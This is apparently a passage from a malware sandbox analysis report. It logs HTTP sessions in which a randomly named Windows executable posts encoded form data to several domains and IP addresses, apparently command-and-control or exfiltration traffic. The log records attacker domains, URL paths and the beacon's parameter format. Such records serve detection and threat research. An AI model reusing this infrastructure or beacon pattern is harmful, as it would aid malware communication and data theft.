9Fjx=rOoz3huJAFOd8auQTDSm1vX5RkahxyYtZtRTfV2xN7pfkG4zSDNw99hcFMWUw04nbjt3mZSxK4D/xus65K50jPF29HLWmFLL8Lpa4N0wPMpaal9+VbX0VYZZx8msX3+dNOMx8w9YG6hvVCElNX7dFjwaV2tbdwn1f1hAeEq8Oo12qpbdui9KlKeImMUHg2VQiIgl7qZH9FulfqsFSW3E3Qsc4IfXiEJqwFZVMtf91gEfQpE2hyavnpb+SGwSc+H33WEphIElLSYrem5RVXeZKUpURtEphNtPOxHtnWzH52HZ3t74qY7UCmBAOJm0QgA3DhRXoNmmIh4FZW7dXCUmbpj1v0v5/Xcn4tYVR+gER+UKKNEcFyCAPujhrW/+ppABAGV0KJaefYNGOfAymV5VO5iHbah9GAICyppByUkZ8iJX6VgDgPgaTy7u8PhRSER0y9QMWy7UDn7GhdHaYfbePctoJ+FzyFCXMN1P+MWSFu4z9BxPJ1gIxYJM2ypJEtuqQHpmfFeOjDFCiexvtMQQvZVAWJoo8llH75p8vfPxgl8d3pSOfwMPlezC43GOBytiBBmOkQtav5CTL7ME8PpZtzJQoa+hSpTN1IxpDsRy14DAanLrwvDa0A0A2UtdjrBUP9ddTSWe484mjl42Io7K/fhVUKrLAImq4B
Jul 27, 2024 08:08:02.131215096 CEST	1236	OUT	POST /8vum/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.desakedungpeluk.com Origin: http://www.desakedungpeluk.com Referer: http://www.desakedungpeluk.com/8vum/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 4f 6f 7a 33 68 75 4a 41 46 4f 64 38 61 75 51 54 44 53 6d 31 76 58 35 52 6b 61 68 78 79 59 74 5a 74 52 54 66 56 32 78 4e 37 70 66 6b 47 34 7a 53 44 4e 77 39 39 68 63 46 4d 57 55 77 30 34 6e 62 6a 74 33 6d 5a 53 78 4b 34 44 2f 78 75 73 36 35 4b 35 30 6a 50 46 32 39 48 4c 57 6d 46 4c 4c 38 4c 70 61 34 4e 30 77 50 4d 70 61 61 6c 39 2b 56 62 58 30 56 59 5a 5a 78 38 6d 73 58 33 2b 64 4e 4f 4d 78 38 77 39 59 47 36 68 76 56 43 45 6c 4e 58 37 64 46 6a 77 61 56 32 74 62 64 77 6e 31 66 31 68 41 65 45 71 38 4f 6f 31 32 71 70 62 64 75 69 39 4b 6c 4b 65 49 6d 4d 55 48 67 32 56 51 69 49 67 6c 37 71 5a 48 39 46 75 6c 66 71 73 46 53 57 33 45 33 51 73 63 34 49 66 58 69 45 4a 71 77 46 5a 56 4d 74 66 39 31 67 45 66 51 70 45 32 68 79 61 76 6e 70 62 2b 53 47 77 53 63 2b 48 33 33 57 45 70 68 49 45 6c 4c 53 59 72 65 6d 35 52 56 58 65 5a 4b 55 70 55 52 74 45 70 68 4e 74 50 4f 78 48 74 6e 57 7a 48 35 32 48 5a 33 74 37 34 71 59 37 55 43 6d 42 41 4f 4a 6d 30 51 67 41 33 44 68 52 58 6f 4e 6d 6d 49 68 34 46 5a [TRUNCATED] Data Ascii: 9Fjx=rOoz3huJAFOd8auQTDSm1vX5RkahxyYtZtRTfV2xN7pfkG4zSDNw99hcFMWUw04nbjt3mZSxK4D/xus65K50jPF29HLWmFLL8Lpa4N0wPMpaal9+VbX0VYZZx8msX3+dNOMx8w9YG6hvVCElNX7dFjwaV2tbdwn1f1hAeEq8Oo12qpbdui9KlKeImMUHg2VQiIgl7qZH9FulfqsFSW3E3Qsc4IfXiEJqwFZVMtf91gEfQpE2hyavnpb+SGwSc+H33WEphIElLSYrem5RVXeZKUpURtEphNtPOxHtnWzH52HZ3t74qY7UCmBAOJm0QgA3DhRXoNmmIh4FZW7dXCUmbpj1v0v5/Xcn4tYVR+gER+UKKNEcFyCAPujhrW/+ppABAGV0KJaefYNGOfAymV5VO5iHbah9GAICyppByUkZ8iJX6VgDgPgaTy7u8PhRSER0y9QMWy7UDn7GhdHaYfbePctoJ+FzyFCXMN1P+MWSFu4z9BxPJ1gIxYJM2ypJEtuqQHpmfFeOjDFCiexvtMQQvZVAWJoo8llH75p8vfPxgl8d3pSOfwMPlezC43GOBytiBBmOkQtav5CTL7ME8PpZtzJQoa+hSpTN1IxpDsRy14DAanLrwvDa0A0A2UtdjrBUP9ddTSWe484mjl42Io7K/fhVUKrLAImq4B
Jul 27, 2024 08:08:02.214540005 CEST	566	OUT	Data Raw: 68 55 67 31 39 49 4b 6c 7a 76 42 49 53 43 41 56 62 30 46 5a 6b 72 72 63 62 73 34 6c 79 6e 51 6e 58 2f 6d 65 70 47 6d 55 44 55 78 64 66 5a 47 4a 57 66 5a 4b 39 44 34 58 70 53 6a 70 48 33 72 6e 6f 75 48 47 73 48 58 44 2f 47 50 38 56 70 39 4a 50 6f Data Ascii: hUg19IKlzvBISCAVb0FZkrrcbs4lynQnX/mepGmUDUxdfZGJWfZK9D4XpSjpH3rnouHGsHXD/GP8Vp9JPoc3onenvxYyQHeYAEPo1WYJNdkZkWCUzply1GNZLvE0CRynaiN3u4QHZGY6u0/lhFGe3eZKagburWub/tz3CO2iw94VMzO56wyi1ST6t4rrQGOlZlaFpDLDAkSht6D7tEV0BAIhWbmKEwyIO0An/qzr/4jgTV1XEfz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	62420	202.52.146.180	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:03.741271019 CEST	491	OUT	GET /8vum/?9Fjx=mMAT0VmYBXrn84GDY3jN9eT5aVT33QlPc8t3UynAD89QghEERF9j2st9BPanxmMeaSIDnLSTLKjuqvUky6NP4LhFqV3UnyKctbAktMQsAL9RdihXFK7EH5ocxuixaBnvMu0t3gQ=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.desakedungpeluk.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:08:04.674226046 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 27 Jul 2024 06:08:04 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jul 27, 2024 08:08:04.675394058 CEST	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	62421	84.32.84.178	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:09.799164057 CEST	774	OUT	POST /7w90/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.michaelstutorgroup.com Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/7w90/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 6a 76 4a 51 42 41 61 6f 56 4e 6f 43 4f 70 56 6b 55 52 45 4a 4d 6a 46 4c 61 50 5a 32 53 31 46 73 66 35 4d 47 6a 4c 51 49 32 6a 75 49 36 4d 62 75 39 65 58 47 71 57 49 49 61 76 44 39 51 73 68 50 66 2b 2b 79 6f 46 4c 34 6b 78 79 59 42 39 49 70 6f 53 78 2f 66 35 70 44 65 54 34 5a 5a 30 2f 45 39 36 39 36 44 49 63 55 72 61 74 4d 6e 4b 41 76 6c 73 50 77 46 4e 43 71 49 32 6c 52 55 48 32 51 78 77 42 57 4f 41 66 61 59 4d 34 41 4b 67 76 74 65 7a 36 49 51 7a 74 2b 71 4b 2f 47 7a 77 56 45 71 6d 77 4c 5a 62 41 69 31 75 47 36 79 7a 39 67 4d 70 6e 55 63 75 7a 31 44 2f 46 54 38 57 35 31 73 32 76 57 67 55 48 2f 46 39 63 Data Ascii: 9Fjx=GjvJQBAaoVNoCOpVkUREJMjFLaPZ2S1Fsf5MGjLQI2juI6Mbu9eXGqWIIavD9QshPf++yoFL4kxyYB9IpoSx/f5pDeT4ZZ0/E9696DIcUratMnKAvlsPwFNCqI2lRUH2QxwBWOAfaYM4AKgvtez6IQzt+qK/GzwVEqmwLZbAi1uG6yz9gMpnUcuz1D/FT8W51s2vWgUH/F9c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	62422	84.32.84.178	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:12.375874043 CEST	798	OUT	POST /7w90/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.michaelstutorgroup.com Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/7w90/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 6a 76 4a 51 42 41 61 6f 56 4e 6f 43 75 5a 56 6a 7a 46 45 63 63 6a 47 46 36 50 5a 2f 79 31 42 73 65 46 4d 47 69 2f 2b 49 6b 48 75 4a 62 38 62 76 2f 6d 58 48 71 57 49 44 36 76 38 79 77 73 36 50 66 36 63 79 73 46 4c 34 6b 31 79 59 46 35 49 70 5a 53 2b 2f 50 35 6e 4c 2b 54 2b 45 4a 30 2f 45 39 36 39 36 48 6b 32 55 72 79 74 50 57 61 41 74 48 45 49 35 6c 4e 46 74 49 32 6c 41 6b 48 79 51 78 77 6a 57 50 73 6c 61 62 6b 34 41 50 45 76 75 4c 54 37 43 51 7a 72 67 71 4c 73 42 47 5a 47 4c 4d 79 78 44 65 33 62 78 48 53 61 2f 45 79 6e 38 2f 70 45 47 4d 4f 78 31 42 6e 33 54 63 57 54 33 73 4f 76 45 33 59 67 77 78 59 2f 57 4f 65 6b 79 68 6a 4f 6b 63 70 42 4b 55 76 75 7a 64 53 6c 7a 77 3d 3d Data Ascii: 9Fjx=GjvJQBAaoVNoCuZVjzFEccjGF6PZ/y1BseFMGi/+IkHuJb8bv/mXHqWID6v8yws6Pf6cysFL4k1yYF5IpZS+/P5nL+T+EJ0/E9696Hk2UrytPWaAtHEI5lNFtI2lAkHyQxwjWPslabk4APEvuLT7CQzrgqLsBGZGLMyxDe3bxHSa/Eyn8/pEGMOx1Bn3TcWT3sOvE3YgwxY/WOekyhjOkcpBKUvuzdSlzw==
Jul 27, 2024 08:08:12.998003006 CEST	1220	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Sat, 27 Jul 2024 06:08:12 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/7w90/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: fabacf233ef9ebe78d2c730dfa397641-bos-edge1 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.155 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	62423	84.32.84.178	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:14.948554039 CEST	1811	OUT	POST /7w90/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.michaelstutorgroup.com Origin: http://www.michaelstutorgroup.com Referer: http://www.michaelstutorgroup.com/7w90/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 47 6a 76 4a 51 42 41 61 6f 56 4e 6f 43 75 5a 56 6a 7a 46 45 63 63 6a 47 46 36 50 5a 2f 79 31 42 73 65 46 4d 47 69 2f 2b 49 6b 50 75 4a 70 45 62 75 65 6d 58 57 61 57 49 66 71 76 39 79 77 74 34 50 65 65 59 79 73 41 30 34 6e 42 79 5a 67 74 49 76 74 6d 2b 6d 2f 35 6e 48 65 54 2f 5a 5a 30 51 45 39 72 36 36 48 55 32 55 72 79 74 50 56 53 41 2b 31 73 49 2f 6c 4e 43 71 49 32 70 52 55 47 6c 51 79 41 5a 57 50 5a 59 61 4c 45 34 41 76 55 76 76 2f 7a 37 59 51 7a 70 6c 71 4b 72 42 47 63 65 4c 49 54 41 44 62 4c 68 78 48 6d 61 2b 44 62 59 6d 63 70 38 45 64 36 2b 71 79 54 46 66 71 62 67 37 65 54 66 4f 46 52 51 34 46 49 78 53 4c 2b 4d 6e 67 4b 6f 69 66 4a 30 44 78 6d 62 79 64 7a 55 72 4a 57 65 68 6b 58 62 4b 48 49 44 75 67 6d 5a 63 31 34 4d 4e 79 45 69 64 6c 38 76 34 7a 59 4f 39 77 44 31 69 46 46 4f 57 46 6c 64 33 58 59 58 48 78 58 30 42 4e 49 30 43 38 78 75 4b 4a 72 66 6a 4e 50 75 6f 4c 76 39 49 33 4c 47 68 4c 4a 76 31 39 2b 41 33 6f 50 73 4e 6a 61 6c 43 35 79 66 36 77 48 59 71 4a 38 4a 73 2f 57 79 37 [TRUNCATED] Data Ascii: 9Fjx=GjvJQBAaoVNoCuZVjzFEccjGF6PZ/y1BseFMGi/+IkPuJpEbuemXWaWIfqv9ywt4PeeYysA04nByZgtIvtm+m/5nHeT/ZZ0QE9r66HU2UrytPVSA+1sI/lNCqI2pRUGlQyAZWPZYaLE4AvUvv/z7YQzplqKrBGceLITADbLhxHma+DbYmcp8Ed6+qyTFfqbg7eTfOFRQ4FIxSL+MngKoifJ0DxmbydzUrJWehkXbKHIDugmZc14MNyEidl8v4zYO9wD1iFFOWFld3XYXHxX0BNI0C8xuKJrfjNPuoLv9I3LGhLJv19+A3oPsNjalC5yf6wHYqJ8Js/Wy7tOfxVNCUvQEo5v0AoimklHb6ENLIXjPKDeWxRksQ0V7tzknGVRpUppNZrferduemeKkl59iVc58FR81H46lHkwc4IjFLoT/2+e14M7p/M1or2qzSzgWsnLhVW+TVoKqE8OyfQnh/Mjy9rZgTQNMe9JbZoqKcqD4x5pwiJ/m6v+biX1omjmknZgT+NYmtVym/NNhuINENzC31Fcqfe9LnVEAqEdoWDA42olNHYio5opvPlbfQvaI7qdC3jLPoK886HGe5+lEvNnyxSpQKlLbdbyJEG2rciSOA0zfDGJchrFyWBPxzqfgaKKxPszn5iCs42SuSJ5FxtwcnNBIlgUJvXNLPgUBD8h0/ppEcHHI/KrEoqeeNGTDSMCZCEBOsjNIMKzxQ2r0/IHmPcrHGQ3SUG5Q0vgTO9v2s0JVgghLsj0GhalqasBqaMnbn/ZD5Kl+7ABbkwtvGIrVZAX9BIyPrVlOe1vd/qjjmLHdaZtwkpu66pf5PUSasfTUF7QaXMbhAhi5d3Fg4Q5y8S8XNuGzE2SGvKzA8hJh97nKYLcHUG8eHXsij40y2ZdM5x4/qEGaDZNduPzG3KtahIi7YSAwESI86iC7C2MU+0PingyDA0EvJ/kc1aA5UEkmWFfwoxt8dgksvtu4gtRTDDd4hA6HtBogTLnJlGDozNq [TRUNCATED]
Jul 27, 2024 08:08:15.578108072 CEST	1220	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Sat, 27 Jul 2024 06:08:15 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/7w90/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: efb0ec102dc9ae62d56101f26a7332c0-bos-edge2 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.155 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	62424	84.32.84.178	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:08:17.521965981 CEST	494	OUT	GET /7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg3jH9QMg622Z6S/PpXr7Dw5Hrqt15Rk+HZEJRRYk4+G8611O/TYHNVjD8KHzBwMH6yNIySy4kYDr0sQvZqeQkDTLiMYeJ4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.michaelstutorgroup.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:08:18.124525070 CEST	1236	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Sat, 27 Jul 2024 06:08:18 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg3jH9QMg622Z6S/PpXr7Dw5Hrqt15Rk+HZEJRRYk4+G8611O/TYHNVjD8KHzBwMH6yNIySy4kYDr0sQvZqeQkDTLiMYeJ4= platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 93afed888c33687b6307e33681043c12-bos-edge2 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.154 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style=
Jul 27, 2024 08:08:18.124538898 CEST	135	IN	Data Raw: 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 Data Ascii: "margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
